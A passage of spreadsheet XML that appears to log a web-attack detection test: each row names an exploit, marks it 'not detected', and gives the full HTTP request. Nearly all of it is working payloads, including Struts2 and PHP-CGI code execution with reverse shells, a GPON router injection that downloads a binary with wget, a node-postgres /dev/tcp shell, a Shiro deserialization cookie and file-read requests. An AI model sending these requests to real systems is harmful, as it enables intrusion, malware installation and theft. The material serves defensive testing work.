        <f>_xlfn.ENCODEURL(C96)</f>
        <v/>
      </c>
    </row>
    <row r="97" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A97" s="2" t="inlineStr">
        <is>
          <t>Apache Solr 远程命令执行</t>
        </is>
      </c>
      <c r="B97" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C97" s="0" t="inlineStr">
        <is>
          <t>POST /solr/demo/config HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 158
Accept-Encoding: identity
{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}</t>
        </is>
      </c>
      <c r="D97" s="0">
        <f>_xlfn.ENCODEURL(C97)</f>
        <v/>
      </c>
    </row>
    <row r="98" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A98" s="2" t="inlineStr">
        <is>
          <t>BEESCMS企业网站管理系admin_book.php后台SQL注入</t>
        </is>
      </c>
      <c r="B98" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C98" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /beescms/admin/admin_book.php?action=del&amp;lang=cn&amp;id=1*&amp;nav=main&amp;admin_p_nav=main_info HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D98" s="0">
        <f>_xlfn.ENCODEURL(C98)</f>
        <v/>
      </c>
    </row>
    <row r="99" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A99" s="2" t="inlineStr">
        <is>
          <t>Struts2远程代码执行(S2-045)</t>
        </is>
      </c>
      <c r="B99" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C99" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /doUpload.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Accept-Encoding: identity
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('X-tGwE')).(#f=@java.io.File@createTempFile('iosN','.exe')).(#f.setExecutable(true)).(#f.deleteOnExit()).(#fos=new java.io.FileOutputStream(#f)).(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).(#fos.write(#d)).(#fos.close()).(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).(#p.start()).(#f.delete())}
X-Tgwe: f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCo+IRRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==
</t>
        </is>
      </c>
      <c r="D99" s="0">
        <f>_xlfn.ENCODEURL(C99)</f>
        <v/>
      </c>
    </row>
    <row r="100" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A100" s="2" t="inlineStr">
        <is>
          <t>ShopXO任意文件读取</t>
        </is>
      </c>
      <c r="B100" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C100" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D100" s="0">
        <f>_xlfn.ENCODEURL(C100)</f>
        <v/>
      </c>
    </row>
    <row r="101" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A101" s="2" t="inlineStr">
        <is>
          <t>netlink gpon路由器命远程代码执行</t>
        </is>
      </c>
      <c r="B101" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C101" s="0" t="inlineStr">
        <is>
          <t>POST /boaform/admin/formPing HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Content-Length: 75
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Pragma: no-cache
X-Requested-With: XMLHttpRequest
target_addr=;cd /tmp; rm -rf; wget http://51.254.23.227/bins/n;chmod 777 n;</t>
        </is>
      </c>
      <c r="D101" s="0">
        <f>_xlfn.ENCODEURL(C101)</f>
        <v/>
      </c>
    </row>
    <row r="102" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A102" s="2" t="inlineStr">
        <is>
          <t>Nexus Repository Manager 3 远程命令执行</t>
        </is>
      </c>
      <c r="B102" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C102" s="0" t="inlineStr">
        <is>
          <t>POST /service/extdirect HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 223
Accept-Encoding: identity
Content-Type: application/json
Nx-Anti-Csrf-Token: 0.3355471197376484
X-Nexus-Ui: true
X-Requested-With: XMLHttpRequest
{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\B{233*233}"]}],"type":"rpc","tid":11}</t>
        </is>
      </c>
      <c r="D102" s="0">
        <f>_xlfn.ENCODEURL(C102)</f>
        <v/>
      </c>
    </row>
    <row r="103" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A103" s="2" t="inlineStr">
        <is>
          <t>taocms任意文件删除</t>
        </is>
      </c>
      <c r="B103" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C103" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /taocms-3.0.2/admin/admin.php?action=file&amp;ctrl=del&amp;path=data/install.lock HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D103" s="0">
        <f>_xlfn.ENCODEURL(C103)</f>
        <v/>
      </c>
    </row>
    <row r="104" ht="23.6" customHeight="1" s="6" thickBot="1">
      <c r="A104" s="2" t="inlineStr">
        <is>
          <t>SQL攻击：HSQLDB &gt;= 1.7.2 堆叠查询注入 (heavy query)</t>
        </is>
      </c>
      <c r="B104" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C104" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /vulnerabilities/sqli_blind/?id=1%29%3BCALL%20REGEXP_SUBSTRING%28REPEAT%28RIGHT%28CHAR%285158%29%2C0%29%2C500000000%29%2CNULL%29--&amp;Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D104" s="0">
        <f>_xlfn.ENCODEURL(C104)</f>
        <v/>
      </c>
    </row>
    <row r="105" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A105" s="2" t="inlineStr">
        <is>
          <t>SQL攻击：Sqlserver sql注入（%u编码）</t>
        </is>
      </c>
      <c r="B105" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C105" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /%25u0073%25u0071%25u004c%25u0053%25u0065%25u0072%25u0076%25u0065%25u0072/%25u0053%25u0065%25u0041%25u0072%25u0063%25u0048/%25u0073%25u0045%25u0061%25u0072%25u0063%25u0068.%25u0041%25u0073%25u0050?%u006e%u0061%u006d%u0065=%u0031%u0027+%u0075%u004e%u0069%u006f%u004e+%u0053%u0065%u006c%u0045%u0063%u0054+%u0031%u002c%u0032%u002c%u0033+%u002d%u002d+ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D105" s="0">
        <f>_xlfn.ENCODEURL(C105)</f>
        <v/>
      </c>
    </row>
    <row r="106" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A106" s="2" t="inlineStr">
        <is>
          <t>泛微E-cology OA /weaver/代码执行</t>
        </is>
      </c>
      <c r="B106" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C106" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /mobile/DBconfigReader.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D106" s="0">
        <f>_xlfn.ENCODEURL(C106)</f>
        <v/>
      </c>
    </row>
    <row r="107" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A107" s="2" t="inlineStr">
        <is>
          <t>SQL攻击：HSQLDB &gt;= 2.0 堆叠查询注入 (heavy query)</t>
        </is>
      </c>
      <c r="B107" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C107" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /vulnerabilities/sqli_blind/?id=1%29%3BCALL%20REGEXP_SUBSTRING%28REPEAT%28LEFT%28CRYPT_KEY%28CHAR%2865%29%7C%7CCHAR%2869%29%7C%7CCHAR%2883%29%2CNULL%29%2C0%29%2C500000000%29%2CNULL%29--&amp;Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D107" s="0">
        <f>_xlfn.ENCODEURL(C107)</f>
        <v/>
      </c>
    </row>
    <row r="108" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A108" s="2" t="inlineStr">
        <is>
          <t>Zabbix 远程代码执行</t>
        </is>
      </c>
      <c r="B108" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C108" s="0" t="inlineStr">
        <is>
          <t>POST /jsrpc.php?output=json-rpc HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 112
Accept-Encoding: identity
Content-Type: application/json-rpc
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
{"jsonrpc": "2.0", "method": "zabbix.status", "params": {}, "auth": "8ab3489dcced2ac4573fee2fdedc58c0", "id": 3}</t>
        </is>
      </c>
      <c r="D108" s="0">
        <f>_xlfn.ENCODEURL(C108)</f>
        <v/>
      </c>
    </row>
    <row r="109" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A109" s="2" t="inlineStr">
        <is>
          <t>node-postgres 代码执行</t>
        </is>
      </c>
      <c r="B109" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C109" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /?id=2;SELECT%201%20AS%20%22\%27]%3D0%3Brequire%3Dprocess.mainModule.constructor._load%3B%2F*%22%2C%202%20AS%20%22*%2Fp%3Drequire(`child_process`)%3B%2F*%22%2C%203%20AS%20%22*%2Fp.exec(`echo%20YmFzaCAtaSA%2BJiAvZGV2L3Rj`%2B%2F*%22%2C%204%20AS%20%22*%2F`cC8xOTIuMTY4Ljc1LjE1MC85OTk5IDA%2BJjE%3D|base64%20-d|bash`)%2F%2F%22 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D109" s="0">
        <f>_xlfn.ENCODEURL(C109)</f>
        <v/>
      </c>
    </row>
    <row r="110" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A110" s="2" t="inlineStr">
        <is>
          <t>TotoLink 多款产品命令注入 (CVE-2022-26208)</t>
        </is>
      </c>
      <c r="B110" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C110" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /cgi-bin/downloadFlile.cgi?payload=`ls&gt;../1.txt` HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D110" s="0">
        <f>_xlfn.ENCODEURL(C110)</f>
        <v/>
      </c>
    </row>
    <row r="111" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A111" s="2" t="inlineStr">
        <is>
          <t>Apache Shiro 反序列化漏洞利用</t>
        </is>
      </c>
      <c r="B111" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C111" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Accept-Encoding: identity
Cookie: rememberMe=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
</t>
        </is>
      </c>
      <c r="D111" s="0">
        <f>_xlfn.ENCODEURL(C111)</f>
        <v/>
      </c>
    </row>
    <row r="112" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A112" s="2" t="inlineStr">
        <is>
          <t>PHP-CGI远程任意代码执行_3</t>
        </is>
      </c>
      <c r="B112" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C112" s="0" t="inlineStr">
        <is>
          <t>POST /?-%64+allow_url_include%3dTrue+--define+safe_mode%3dfaLse+-%64+suhosin.simulation%3don+--define+disable_functions%3d%22%22+-d+open_basedir%3dnone+-%64+auto_prepend_file%3dphp://input+--define+cgi.force_redirect%3dOFf+--define+cgi.redirect_status_env%3d0+--no-php-ini HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 236
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&lt;?php system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0NDQ0LFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTtzeXN0ZW0kXyB3aGlsZTw+Jw=='));</t>
        </is>
      </c>
      <c r="D112" s="0">
        <f>_xlfn.ENCODEURL(C112)</f>
        <v/>
      </c>
    </row>
    <row r="113" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A113" s="2" t="inlineStr">
        <is>
          <t>uWSGI 目录穿越 (CVE-2018-7490)</t>
        </is>
      </c>
      <c r="B113" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C113" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D113" s="0">
        <f>_xlfn.ENCODEURL(C113)</f>
        <v/>
      </c>
    </row>
    <row r="114" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A114" s="2" t="inlineStr">
        <is>
          <t>Supervisord 远程代码执行_2</t>
        </is>
      </c>
      <c r="B114" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C114" s="0" t="inlineStr">
        <is>
          <t>POST /RPC2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 303
Accept-Encoding: identity
Content-Type: text/xml
&lt;?xml version="1.0"?&gt;
&lt;methodCall&gt;
  &lt;methodName&gt;supervisor.supervisord.options.warnings.linecache.os.system&lt;/methodName&gt;
  &lt;params&gt;
    &lt;param&gt;
      &lt;string&gt;echo -n cm0gLWYgJy90bXAvV0VHYXAuYjY0Jw==|base64 -d|nohup bash &gt; /dev/null 2&gt;&amp;amp;1 &amp;amp;&lt;/string&gt;
    &lt;/param&gt;
  &lt;/params&gt;
&lt;/methodCall&gt;</t>
        </is>
      </c>
      <c r="D114" s="0">
        <f>_xlfn.ENCODEURL(C114)</f>
        <v/>
      </c>
    </row>
    <row r="115" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A115" s="2" t="inlineStr">
        <is>
          <t>PHP-CGI远程任意代码执行_2</t>
        </is>
      </c>
      <c r="B115" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C115" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST /?-d+allow_url_include%3don+-d+safe_mode%3dofF+--define+suhosin.simulation%3doN+-%64+disable_functions%3d%22%22+--define+open_basedir%3dnone+--define+auto_prepend_file%3dphp://input+-%64+cgi.force_redirect%3dfALSE+--define+cgi.redirect_status_env%3d0+--no-php-ini HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 1925
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&lt;?php /*&lt;?php /**/      @error_reporting(0);      @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);      $ZxPDVY=@ini_get('disable_functions');      if(!empty($ZxPDVY)){        $ZxPDVY=preg_replace('/[, ]+/', ',', $ZxPDVY);        $ZxPDVY=explode(',', $ZxPDVY);        $ZxPDVY=array_map('trim', $ZxPDVY);      }else{        $ZxPDVY=array();      }      $c = base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjI0OC4xMzI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTtzeXN0ZW0kXyB3aGlsZTw+Oyc=');      if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {        $c=$c." 2&gt;&amp;1\n";      }      $jRxxFrY='is_callable';      $VdAn='in_array';            if($jRxxFrY('passthru')and!$VdAn('passthru',$ZxPDVY)){        ob_start();        passthru($c);        $leaCHw=ob_get_contents();        ob_end_clean();      }else      if($jRxxFrY('system')and!$VdAn('system',$ZxPDVY)){        ob_start();        system($c);        $leaCHw=ob_get_contents();        ob_end_clean();      }else      if($jRxxFrY('shell_exec')and!$VdAn('shell_exec',$ZxPDVY)){        $leaCHw=shell_exec($c);      }else      if($jRxxFrY('exec')and!$VdAn('exec',$ZxPDVY)){        $leaCHw=array();        exec($c,$leaCHw);        $leaCHw=join(chr(10),$leaCHw).chr(10);      }else      if($jRxxFrY('proc_open')and!$VdAn('proc_open',$ZxPDVY)){        $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);        $leaCHw=NULL;        while(!feof($pipes[1])){          $leaCHw.=fread($pipes[1],1024);        }        @proc_close($handle);      }else      if($jRxxFrY('popen')and!$VdAn('popen',$ZxPDVY)){        $fp=popen($c,'r');        $leaCHw=NULL;        if(is_resource($fp)){          while(!feof($fp)){            $leaCHw.=fread($fp,1024);          }        }        @pclose($fp);      }else      {        $leaCHw=0;      }    </t>
        </is>
      </c>
      <c r="D115" s="0">
        <f>_xlfn.ENCODEURL(C115)</f>
        <v/>
      </c>
    </row>
    <row r="116" ht="14.6" customHeight="1" s="6" thickBot="1">
